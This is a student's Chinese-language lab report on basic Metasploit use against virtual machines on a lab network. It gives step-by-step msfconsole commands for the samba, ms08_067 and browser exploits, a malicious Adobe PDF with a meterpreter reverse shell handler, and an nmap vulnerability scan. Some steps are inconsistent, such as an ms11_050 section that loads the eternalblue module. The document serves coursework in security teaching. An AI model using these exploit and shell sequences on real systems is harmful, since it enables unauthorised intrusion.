20165214 2018-2019-2 《網絡對抗技術》Exp5 MSF基礎應用 Week8

《網絡對抗技術》Exp5 MSF基礎應用 Week8

1、實驗目標與內容

  • 1.實踐內容(3.5分)linux

    • 本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體我嘗試了:web

      • 1.1主動攻擊實踐:
        • 靶機爲WinXPEnSP3的ms08_067(失敗,不惟一);
        • 靶機爲Linux Metasploit的samba的「軍刀」漏洞(成功,惟一);
      • 1.2 針對瀏覽器的攻擊(靶機爲Win7):
        • ms11_050,載荷爲payload windows/metsvc_bind_tcp(失敗,惟一);
        • 載荷爲generic/shell_reverse_tcp(成功,不惟一);
        • 載荷爲windows/x64/shell_bind_tcp(成功,惟一)
      • 1.3 一個針對客戶端的攻擊:Adobe(成功不惟一);shell

      • 1.4 成功應用輔助模塊:scanner/http/options(成功,不惟一)。windows

  • 2.一些問題api

    • 2.1 用本身的話解釋什麼是exploit,payload,encode?
    • exploit:執行攻擊
    • payload:執行攻擊時所使用的道具
    • encode:對道具進行包裝瀏覽器

    • 2.2.離實戰還缺些什麼技術或步驟?
    • 免殺技術吧,如今咱們還不能很好地實現真正意義上的免殺;還有就是咱們製做的後門程序都很簡單,,通常人看都看出來是不正經軟件了。服務器

      2、實驗步驟

一:靶機爲Linux Metasploit的samba漏洞

  • 1.打開kali與Linux Metasploit,測試兩虛擬機之間可否ping通:
    網絡

  • 2.查看以前寫好的腳本
    tcp

  • 3.在命令行輸入msfconsole -r msfcli.rc運行在以前我已經寫好的腳本,攻擊成功
    學習

二:靶機爲WinXPEnSP3的ms08_067漏洞

  • 1.打開WinXPEnSP3虛擬機。將其網絡鏈接方式改成NAT模式後重啓。測試其與kali可否相互ping通:

  • 2.切換到kali虛擬機界面,輸入msfconsole啓動msf。啓動後輸入search ms08_067,出現了一條漏洞信息。

  • 3.輸入use windows/smb/ms08_067_netapi

  • 4.輸入show payload,出現載荷列表,發現有100多個載荷

  • 5.輸入set payload generic/shell_reverse_tcp設置載荷。

  • 6.輸入show options查看參數。發現源IP和目的IP還沒設置,輸入set PHOST 192.168.10.12set LHOST 10.10.10.128設定參數

  • 7.輸入run開始攻擊。攻擊失敗。(這裏好多同窗都成功了哎,,不知道是否是下載途徑不同的緣由。)

針對瀏覽器的攻擊(靶機爲Win7):ms11_050(因爲攻擊的步驟大同小異,接下來就不每次操做都截圖了~)

  • 1.打開Win7虛擬機。測試可否與kali相互ping通
  • 2.在kali打開msf後,輸入search ms11_050,查詢跟漏洞相關的信息
  • 3.輸入use exploit/windows/smb/ms17_010_eternalblue
  • 4.輸入show payloads,查詢有哪些載荷
  • 5.輸入set payload generic/shell_reverse_tcp設定輸入載荷
  • 6.輸入show options,查看有哪些參數須要設置。發現還空缺的參數是LHOST和RHOST。輸入set RHOST 10.10.10.132set LHOST 10.10.10.128設定參數
  • 7.輸入exploit開始攻擊,執行一段時間後卡在了以下界面:

  • 8.一開始我覺得是在攻擊過程當中卡住了,等了一會後又重啓了好幾回,後來上網查後發現到這一步的時候須要在靶機上的IE瀏覽器上輸入[攻擊方IP地址]/*,而後才能回連成功。
  • 9.在靶機上打開IE瀏覽器,輸入10.10.10.128/5214

  • 10.回到kali,輸入ipconfig指令和pwd指令進行測驗,鏈接成功:

  • 11.換一個payload:set payload windows/metsvc_bind_tcp
  • 12.輸入參數後鏈接失敗:

  • 13.再換一個payload:windows/x64/shell_bind_tcp,這回在Win7打開IE後輸入10.10.10.128,回連成功

針對客戶端的攻擊(靶機爲Win7):Adobe

  • 1.在kali打開msf後,輸入search adobe,查詢跟漏洞相關的信息
  • 2.輸入use windows/fileformat/adobe_cooltype_sing
  • 3.輸入show payloads,查詢有哪些載荷
  • 4.輸入set payload windows/meterpreter/reverse_tcp設定輸入載荷
  • 5.輸入show options,查看有哪些參數須要設置。發現還空缺的參數是LHOST和RHOST。輸入set RHOST 10.10.10.132set LHOST 10.10.10.128設定參數
  • 6.提示在.msf/local下生成了pdf。

  • 7.將生成的pdf放到Win7上面去
  • 8.在msf輸入use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp後進入監聽模式,設定LHOSTset LHOST 10.10.10.128,輸入exploit開始監聽。這時候切換到Win7打開該pdf,回連成功:

成功應用輔助模塊(靶機爲Windows 2008)

  • 1.打開Win 2008,測試與kali可否相互ping通
  • 2.在kali的msf下輸入search auxiliary查找輔助模塊,發現有1000多個。
  • 3.在經歷了n屢次的嘗試失敗後終於找到了一個成功的:scanner/http/options

3、遇到的問題

-1.在攻擊靶機爲WinXPEnSP3的ms08_067漏洞以前,測試可否ping通,發現不能ping通。

  • 解決方法:這裏是由於我根據教材的環境配置把XP設置爲了內網,而kali在DMZ區,因此須要啓動網關服務器才能夠ping通。所以在這裏須要啓動個人第三臺虛擬機Linux Metasploit

  • 2.在實驗中,有時候靶機並不存在咱們想要攻擊的漏洞,一個一個試又要花費很長的時間。在同窗的幫助下,我發現了能夠用nmap來提早檢測漏洞是否存在。不過這已是我在作完全部實驗步驟以後才知道的了。我拿了一個我攻擊失敗了的漏洞(靶機爲WinXPEnSP3的ms08_067)來進行嘗試,在命令行輸入nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.10.128,發現沒有該漏洞相關的字段,不過能夠看到目標系統。

4、心得體會

  • 第一次看到這個題目的時候仍是感受比較欣喜的。由於我最近恰好在自學教材,因此電腦上有不少的靶機,對於msf命令的使用也比較熟練,作起來較爲簡單,出現的問題也較多的是在看不懂英文。。。不過我感受也不能就這樣感到知足,由於實驗畢竟是頗有限的,不少東西實際上是很理想化的,在現實生活中不可能奏效。每次在作實驗的時候都會想要嘗試一下比較「實際」的操做,好比鏈接到不一樣網段,好比可以攻擊比較新的操做系統而後不被發現等等。可是如今本身的這方面能力仍是比較弱,至今沒有成功過。相信從此會成功的~
  • 同時,這周我跟着大佬們去參加了CTF。其實我也只是學了20多天的web模塊,可是我仍是堅持要去體驗一下,想看看這個比賽是怎麼樣的,也想看看咱們的課程和它之間的聯繫。我仍是很慶幸這兩天花了不少時間來參加這個的雖然作不出來,但作的過程當中多掌握了不少課程內沒有的知識。同時,國內那些大佬們也讓我深深地感到自愧不如,雖然在電科院成績還能夠,可是真是沒辦法拿出去跟人比。之後仍是要多學習信安方面的技能,不能知足於校內,應該走出學校,多看看其餘學校的水平。
相關文章
相關標籤/搜索